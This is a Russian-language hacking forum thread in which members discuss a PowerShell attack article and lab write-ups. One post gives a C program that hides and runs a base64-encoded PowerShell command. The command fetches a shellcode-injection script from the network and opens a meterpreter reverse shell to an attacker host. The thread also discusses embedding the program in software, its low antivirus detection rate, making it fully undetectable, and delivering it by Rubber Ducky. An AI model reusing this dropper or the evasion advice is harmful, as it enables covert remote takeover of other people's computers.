 |
|

07.12.2016, 18:58
|
|
Новичок
Регистрация: 06.12.2016
Сообщений: 0
С нами:
4965088
Репутация:
0
|
|
Спасибо за статью,не подкинете пару книг по powershell?
|
|
|

07.12.2016, 22:02
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
MAdDog719 сказал(а):
Пожалуйста напиши статью как проходил лабораторию.
Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)
|
|
|

07.12.2016, 22:30
|
|
Новичок
Регистрация: 20.07.2016
Сообщений: 0
С нами:
5165072
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)
Если вы это сделаете, то я буду самым счастливым человеком на свете.
|
|
|

09.12.2016, 09:33
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
|
|
|

10.12.2016, 15:48
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
D8mbsniper сказал(а):
Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться"
Обычно в этих целях его чаще используют)))
|
|
|

13.12.2016, 17:00
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
|
|
|

14.12.2016, 03:33
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
kot-gor сказал(а):
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?
Тестанул вот на детект,весьма не плохо, 2/35 (правда аваспом палится) Но можно в принципе достич и фуда (FuD) если небольшие манипуляции сделать
http://NoDistribute.com/result/FkiQhHjaUrIZAsfWG
C:
Код:
#include
int
main
(
)
{
system
(
"powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADIALgAxADAAMgAgAC0ATABwAG8AcgB0ACAAMQAzADMANwAgAC0ARgBvAHIAYwBlAA=="
)
;
return
0
;
}
|
|
|

10.01.2017, 16:31
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
stilya сказал(а):
Ничего не понятно...что копировать и куда вставлять и что менять?
Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...
|
|
|

10.01.2017, 17:00
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
stilya сказал(а):
А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут
Мануал расчитан,на то что у людей которые его читают есть хоть какое то понятие о том что они делают. Вы уж простите ,но если вы ничего не поняли с этого мануала - то будет лучше для вас и окружающих если прекратите свои експеременты...
|
|
|

10.01.2017, 17:18
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
stilya сказал(а):
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
Да, я демонстрирую это на виртуальных машинах:
Во первых - это этично
Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций.
Интересно... Назовите причины , по которым это не будет работать на реальных устройствах.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|